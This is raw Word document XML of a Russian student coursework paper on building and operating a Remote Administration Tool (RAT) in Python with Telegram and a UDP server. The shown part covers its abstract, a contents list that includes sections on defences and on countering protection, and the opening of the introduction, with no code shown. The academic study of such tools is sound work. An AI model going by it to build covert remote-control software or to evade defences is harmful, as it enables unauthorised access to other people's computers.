      <w:r w:rsidRPr="00E46359">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00CD560C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>изучение языка программирования общего назначения</w:t>
      </w:r>
      <w:r w:rsidR="00CD560C" w:rsidRPr="00E46359">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E46359">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidR="00CD560C" w:rsidRPr="00E46359">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E46359" w:rsidRPr="00E46359">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>библи</w:t>
      </w:r>
      <w:r w:rsidR="00E46359">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">отеки создания низкоуровнего сетевого интерфейса – </w:t>
      </w:r>
      <w:r w:rsidR="00E46359" w:rsidRPr="00E46359">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r w:rsidR="00CD560C" w:rsidRPr="00E46359">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E46359" w:rsidRPr="00E46359">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>моду</w:t>
      </w:r>
      <w:r w:rsidR="00E46359">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>лей управления операционной системой.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F04C89" w14:textId="77777777" w:rsidR="00847E31" w:rsidRPr="00D12725" w:rsidRDefault="00847E31" w:rsidP="00847E3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D12725">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель работы – изучить </w:t>
      </w:r>
      <w:r w:rsidR="00E46359">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>принципы работы</w:t>
      </w:r>
      <w:r w:rsidRPr="00D12725">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E46359">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>инструментов удалённого доступа</w:t>
      </w:r>
      <w:r w:rsidR="00CA19C8">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, создать </w:t>
      </w:r>
      <w:r w:rsidR="00C563E3">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">и провести эксплуатацию </w:t>
      </w:r>
      <w:r w:rsidR="00C563E3" w:rsidRPr="00C563E3">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Remote</w:t>
      </w:r>
      <w:r w:rsidR="00C563E3" w:rsidRPr="006805E4">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C563E3" w:rsidRPr="00C563E3">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Administration</w:t>
      </w:r>
      <w:r w:rsidR="00C563E3" w:rsidRPr="006805E4">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C563E3" w:rsidRPr="00C563E3">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tool</w:t>
      </w:r>
      <w:r w:rsidR="004E187A">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B4E628" w14:textId="77777777" w:rsidR="00847E31" w:rsidRPr="00D12725" w:rsidRDefault="00847E31" w:rsidP="00847E3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D12725">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Методы исследования: описательно-аналитические, сравнительные.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EE63D3" w14:textId="77777777" w:rsidR="00C563E3" w:rsidRPr="00C563E3" w:rsidRDefault="00847E31" w:rsidP="00C563E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D12725">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Теоретическая и практическая значимость: </w:t>
      </w:r>
      <w:r w:rsidR="00C563E3" w:rsidRPr="00D12725">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>курсовая работа может быт</w:t>
      </w:r>
      <w:r w:rsidR="00C563E3">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ь использована для эксплуатации инструмента удалённого администрирования, оценки поведения не легитимных </w:t>
      </w:r>
      <w:r w:rsidR="00C563E3" w:rsidRPr="00C563E3">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RAT</w:t>
      </w:r>
      <w:r w:rsidR="00C563E3" w:rsidRPr="00C563E3">
        <w:rPr>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00C563E3" w:rsidRPr="00C563E3">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C563E3">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тестирования на наличие уязвимости.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F786094" w14:textId="77777777" w:rsidR="00AC075A" w:rsidRDefault="00AC075A" w:rsidP="00BA0171">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:id w:val="623885714"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w14:paraId="481E002E" w14:textId="77777777" w:rsidR="00146762" w:rsidRPr="00CF3F87" w:rsidRDefault="0001026E" w:rsidP="00CF3F87">
          <w:pPr>
            <w:pStyle w:val="af0"/>
            <w:rPr>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00951E3A">
            <w:rPr>
              <w:color w:val="000000" w:themeColor="text1"/>
            </w:rPr>
            <w:t>Содержание</w:t>
          </w:r>
          <w:r w:rsidR="006B3ECB" w:rsidRPr="001B187E">
            <w:rPr>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="000114BD" w:rsidRPr="001B187E">
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidR="006B3ECB" w:rsidRPr="001B187E">
            <w:rPr>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc105065715" w:history="1"/>
        </w:p>
        <w:p w14:paraId="41F9CCA3" w14:textId="1D556AB1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16" w:history="1">
            <w:r w:rsidR="00146762" w:rsidRPr="008A283E">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Введение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_Toc105065716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4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272C6095" w14:textId="1E07701A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17" w:history="1">
            <w:r w:rsidR="00146762" w:rsidRPr="008A283E">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1 Технология разработки клиент-серверного взаимодействия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_Toc105065717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6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6C820606" w14:textId="0B117798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18" w:history="1">
            <w:r w:rsidR="00146762" w:rsidRPr="008A283E">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2 Этапы разработки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_Toc105065718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7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532E0279" w14:textId="1CF41A18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19" w:history="1">
            <w:r w:rsidR="00146762" w:rsidRPr="008A283E">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">2.1 Создание </w:t>
            </w:r>
            <w:r w:rsidR="00146762" w:rsidRPr="008A283E">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:i/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RAT</w:t>
            </w:r>
            <w:r w:rsidR="00146762" w:rsidRPr="008A283E">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:i/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00146762" w:rsidRPr="008A283E">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
            <w:r w:rsidR="00146762" w:rsidRPr="008A283E">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> использованием </w:t>
            </w:r>
            <w:r w:rsidR="00146762" w:rsidRPr="008A283E">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:i/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Telegram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_Toc105065719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7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2721C42F" w14:textId="346D1279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20" w:history="1">
            <w:r w:rsidR="00146762" w:rsidRPr="008A283E">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2 Решение проблемы распределённого управления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_Toc105065720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9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55700BF3" w14:textId="2DBB27DA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21" w:history="1">
            <w:r w:rsidR="00146762" w:rsidRPr="008A283E">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">2.3 Разработка </w:t>
            </w:r>
            <w:r w:rsidR="00146762" w:rsidRPr="008A283E">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:i/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>UDP</w:t>
            </w:r>
            <w:r w:rsidR="00146762" w:rsidRPr="008A283E">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>-сервера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_Toc105065721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10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4687510E" w14:textId="64BC8CDC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22" w:history="1">
            <w:r w:rsidR="00146762" w:rsidRPr="008A283E">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">2.5 </w:t>
            </w:r>
            <w:r w:rsidR="00146762" w:rsidRPr="008A283E">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Разработка клиентской программы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_Toc105065722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11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503D4F84" w14:textId="09D5C583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23" w:history="1">
            <w:r w:rsidR="00146762" w:rsidRPr="008A283E">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">2.6 </w:t>
            </w:r>
            <w:r w:rsidR="00146762" w:rsidRPr="008A283E">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Разработка программы-менеджера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_Toc105065723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13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5B205517" w14:textId="4916A773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24" w:history="1">
            <w:r w:rsidR="00146762" w:rsidRPr="008A283E">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3 Выполнение программ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_Toc105065724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15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026D40E8" w14:textId="2332A8D4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25" w:history="1">
            <w:r w:rsidR="00146762" w:rsidRPr="008A283E">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1 Развёртывание сервера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_Toc105065725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15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345FA6D3" w14:textId="77D6518F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26" w:history="1">
            <w:r w:rsidR="00146762" w:rsidRPr="008A283E">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2 Исполнение клиентской программы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_Toc105065726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15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548FBC61" w14:textId="52154343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27" w:history="1">
            <w:r w:rsidR="00146762" w:rsidRPr="008A283E">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">4 Методы защиты от внедрения и исполнения </w:t>
            </w:r>
            <w:r w:rsidR="00146762" w:rsidRPr="008A283E">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:i/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RAT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_Toc105065727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18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293AA9E9" w14:textId="790C34E6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28" w:history="1">
            <w:r w:rsidR="00146762" w:rsidRPr="008A283E">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5 Методы противодействия защите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_Toc105065728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19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4A950CDC" w14:textId="5F58BB3D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29" w:history="1">
            <w:r w:rsidR="00146762" w:rsidRPr="008A283E">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Заключение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_Toc105065729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20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531B3D1F" w14:textId="1E3D93B6" w:rsidR="00146762" w:rsidRDefault="00C750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5065730" w:history="1">
            <w:r w:rsidR="00146762" w:rsidRPr="008A283E">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Список использованных источников</w:t>
            </w:r>
            <w:r w:rsidR="00146762">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00146762">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00146762">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc105065730 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00146762">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00146762">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006D560A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r w:rsidR="00146762">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5704A900" w14:textId="77777777" w:rsidR="00573F16" w:rsidRPr="001B187E" w:rsidRDefault="006B3ECB" w:rsidP="001B187E">
          <w:pPr>
            <w:spacing w:line="360" w:lineRule="auto"/>
            <w:jc w:val="both"/>
          </w:pPr>
          <w:r w:rsidRPr="001B187E">
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="68D43D90" w14:textId="77777777" w:rsidR="000114BD" w:rsidRPr="001B187E" w:rsidRDefault="000114BD" w:rsidP="001B187E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="314AB1FA" w14:textId="77777777" w:rsidR="00573F16" w:rsidRPr="001B187E" w:rsidRDefault="00573F16" w:rsidP="001B187E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="199A968B" w14:textId="77777777" w:rsidR="00573F16" w:rsidRPr="001B187E" w:rsidRDefault="00573F16" w:rsidP="001B187E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A8E1A5A" w14:textId="77777777" w:rsidR="00573F16" w:rsidRPr="001B187E" w:rsidRDefault="00573F16" w:rsidP="001B187E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1895CFF4" w14:textId="77777777" w:rsidR="00FB5D08" w:rsidRDefault="00FB5D08">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left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8" w:name="_Toc90401231"/>
      <w:bookmarkStart w:id="9" w:name="_Toc104228644"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="465794A3" w14:textId="77777777" w:rsidR="00FF393F" w:rsidRPr="00360450" w:rsidRDefault="00573F16" w:rsidP="00360450">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc105065716"/>
      <w:r w:rsidRPr="00360450">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Введение</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="28EE189E" w14:textId="77777777" w:rsidR="00233C23" w:rsidRDefault="00233C23" w:rsidP="00233C23"/>
    <w:p w14:paraId="51333259" w14:textId="77777777" w:rsidR="004F646A" w:rsidRPr="003D7404" w:rsidRDefault="00630D67" w:rsidP="004F646A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В настоящее время многие частные сети используют ресурсы удалённого доступа</w:t>
      </w:r>
      <w:r w:rsidR="004F646A" w:rsidRPr="004F646A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Это позволяет удешевить обслуживание автоматизированных систем управления, уменьшить время реагирования в </w:t>
      </w:r>
      <w:r w:rsidR="003D7404">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>луч</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>е в</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>зникн</w:t>
      </w:r>
      <w:r w:rsidR="003D7404">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>вения</w:t>
      </w:r>
      <w:r w:rsidR="003D7404" w:rsidRPr="003D7404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3D7404">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">неполадок, улучшить качество работы персональными вычислительными машинами клиентов. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341F6F14" w14:textId="77777777" w:rsidR="004F646A" w:rsidRPr="004F6A75" w:rsidRDefault="003D7404" w:rsidP="004F646A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Для организации удалённого доступа к клиентской вычислительной машине нередко используются сторонние инструменты</w:t>
      </w:r>
      <w:r w:rsidR="005C7EBB" w:rsidRPr="005C7EBB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="005C7EBB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>загружаемые из дистрибутивов, имеющие набор преимуществ перед встроенными средствами удалённого доступа, такими как протокол удалённого рабочего стола –</w:t>
      </w:r>
      <w:r w:rsidR="005C7EBB" w:rsidRPr="005C7EBB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5C7EBB" w:rsidRPr="005C7EBB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>RDP</w:t>
      </w:r>
      <w:r w:rsidR="004F6A75" w:rsidRPr="004F6A75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34F51793" w14:textId="77777777" w:rsidR="00E46359" w:rsidRPr="00E46359" w:rsidRDefault="00E46359" w:rsidP="004F646A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 xml:space="preserve">Сторонние инструменты, позволяющие получить удалённый доступ к вычислительной машине, зачастую именуются как </w:t>
      </w:r>
      <w:r w:rsidRPr="00E46359">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>RAT</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46359">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i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i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46359">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i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i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Remote</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46359">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i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i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Administration</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46359">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i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i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Tool</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46359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39963CEB" w14:textId="77777777" w:rsidR="005C7EBB" w:rsidRDefault="005C7EBB" w:rsidP="004F646A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По</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7EBB">
        <w:rPr>
          <w:rFonts w:eastAsia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Cs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>данным</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7EBB">
        <w:rPr>
          <w:rFonts w:eastAsia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5C7EBB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Kasperksy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C7EBB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7EBB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7EBB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7EBB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Network</w:t>
      </w:r>
